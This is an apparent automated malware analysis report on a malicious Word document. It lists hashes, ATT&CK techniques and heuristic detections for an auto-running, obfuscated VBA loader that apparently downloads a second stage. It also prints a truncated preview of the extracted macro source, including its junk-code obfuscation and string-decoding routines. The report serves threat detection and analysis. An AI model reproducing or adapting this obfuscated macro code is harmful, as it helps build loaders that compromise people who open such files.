Office (OOXML) malware analysis — malicious · 3dc173a0a8ae7aee

MALICIOUS

Office (OOXML)

67.5 KB Created: 2019-08-29 14:58:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2020-04-06

MD5: e298f3ef2a1d37e479d900ebba22f295 SHA-1: d599c4424723c93f7cf541656eca9b9485e490cc SHA-256: 3dc173a0a8ae7aee01688f59ba34dc15f28a7bddb71fe0c0abe5deb2821a9f4e

270 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is an OOXML document containing a malicious VBA macro. The macro is obfuscated and uses `CreateObject` and `Shell()` calls, indicating an intent to execute arbitrary code. The presence of an `AutoOpen` macro further suggests an automated execution path upon opening the document. The script's primary function appears to be downloading and executing a second-stage payload.

Heuristics 8

VBA project inside OOXML medium 6 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2010/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	17325 bytes
SHA-256: `7c78f1ccc5e6b6fec78d568875eea13581824fe1021f12d3c9d41c3e7795234a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "UserForm8" Attribute VB_Base = "0{7B51DE7A-ABE7-428A-9155-D7C5B65317C7}{C40E55C8-8D09-4CE8-ACB8-4BC9B4EFF54F}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "NewMacros1" Function afBqVf2_Wk9() hfjkgnzk = Not (-14341 < 9513) IHZVzAtp = Not (29425 < 14397) lGerggU = -17528 Mod -4044 afBqVf2_Wk9 = RTrim("eR+%K{/2") HhyYq9Qxy = Not (-1074 = 9196) kwAA = Not (12139 = -19143) kpUVUjd74D = Not (22684 < -16309) W0rtQImw = Not (2676 < -23584) F0Ttd = Not (-28836 = -10572) End Function Sub Y43w(lrpwniuAa As Long) Dim ePnRknu As Long Dim FWf As Long FWf = GetTickCount + (lrpwniuAa * 1000) Do ePnRknu = GetTickCount 'Marietta enations MYPs = 20471 Mod -16361 Dim EbpE6gs5W8 As Variant EbpE6gs5W8 = "F9=kryJ#`v'ZUkWMEYjTirNw@ali2Bl'N93D#R=cl9~BO)4@(;)RBAi5NBh?`lsRZ/<dQG7\|.^yPFdO:@m[FHwgG3cx`39Zyf}x=c}Wl%xwh+uC" uEEQgVKz = -9747 Mod 16915 Loop Until ePnRknu >= FWf End Sub Function Xvl(EuKC8 As String, uzHkLZ As String, DTi) BMPDvL = Not (-18758 = -20608) Dim ZRFn As Integer ZRFn = 14872 For ORXDWP = 2 To 26 ZRFn = ZRFn + ORXDWP Next ORXDWP LHaOrT0lg8 = -18438 Mod -29578 baAx = 22678 Mod 21557 Dim lKEUh5 As String Okl = Not (-16329 = -2400) m1RXTRpc_Zh = 13496 Mod -27262 DsU4xL = -18286 Mod 4312 VDQVqQ4 = 3931 Mod -7621 e7k0 = -21444 Mod -20697 Dim xWUs7WB As String Dim uMrH As Variant uMrH = 21992 Dim kgLuE5 As Integer kgLuE5 = -28616 TSiynV = -4388 Mod -20792 oZNNinwgx2 = -3704 Mod -25357 q9a4h = 27390252.72 bCnvoB0 = 23819 Mod -26259 eeolx = 5220 Mod 7259 fYK_H1 = 3077 Mod 19459 cmMOO = Not (3574 = -7840) Dim T8gAzNGm As String aurD = -4592 Mod -7570 SUTKC = 1742 Mod 11568 XEcO3 = Not (-15011 < -18436) EzUqHWIwaY = 23289 Mod 1029 KNGMaulr = -138382889 LLJw = -21922 Mod 23129 Dim UnjnFLYx As Integer UnjnFLYx = 18512 For zE0TvbOC = 1 To 97 UnjnFLYx = UnjnFLYx + zE0TvbOC Next zE0TvbOC z9z2iJkTuj = 29807 Mod 13932 MsNlExt = -348587.9633 DEfM = YzJ("`ShUg;xm", "-10039") lKEUh5 = Environ(uzHkLZ) If Second("12:34:49") = "49" Then lKEUh5 = Replace(lKEUh5, "\", "\\") End If Dim UGKl6YS9 As String UGKl6YS9 = "Qb?DSmzbF#9_>TZ" Dim V_iBTw3h As Variant V_iBTw3h = 24914 KEbkw3fUa = "wM(A{c2aLy" tNZp5H8Nwv = 4 Dim taO As Integer taO = 219 For DKeop_pZLdV = 2 To 89 taO = taO + DKeop_pZLdV Next DKeop_pZLdV MHaxdvzrz6 = -140330102 QHVdJrP6 = 23763 Mod 2488 mTF3u_hiMMM = 175705671 XxS0w1ouC_G = -152215080 xWUs7WB = Mid(EuKC8, 1, 1395) & lKEUh5 YHzwd2G9R = 20288 Mod -3251 hriDjZi0A = -6989 Mod 16850 In9g = -8338 Mod 23683 T8gAzNGm = KrX(xWUs7WB, lKEUh5, 1279) eRXlouL = 17453 Mod 8578 n3KY1FMt = 28996 Mod -5101 Dim k7E As Variant k7E = "6qoG.?u.uu\Cwmh@#VEz4h_KZd2RFTZn;;~_WBzWn}2!`fJ7/OEt3]P^Z0cgIC}4%YY:T}sy>AW'n)=VPv,bScYEE#Iw\|vKDLbE)uMm2y'&u!`8zc$H{@h~e}40H-@a>Q+)SMw=g&*&}" Dim bLcYm8gObKU As Integer bLcYm8gObKU = -9746 For nKSz = 0 To 73 bLcYm8gObKU = bLcYm8gObKU + nKSz Next nKSz Xvl = Tr8DzwWXVXR(EuKC8, xWUs7WB, T8gAzNGm, lKEUh5, 1) oyn935 = Not (-3091 < -29773) RlGy = -17981 Mod -24214 WPBsnB4 = 2917 Mod -11829 Dim hVVVDCm__F As Byte hVVVDCm__F = 248 Dim Yx4 As Single Yx4 = -3057181.1332 ZzxYFpfFg = Not (-19556 > 1279) m_nxAeKcQ2u = -14978 Mod -22976 End Function Function KrX(JPcE As String, k07h As String, mcGWW2F) Dim F_TGRPKc8 As Integer F_TGRPKc8 = 1377 For T236 = 2 To 18 F_TGRPKc8 = F_TGRPKc8 ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	62976 bytes
SHA-256: `7c6a8f693dc81fb93827f9ab09a826236f84708bc8f0b47cc79ad32577828f0a`

Open this report in the interactive analyzer, or submit your own file for analysis.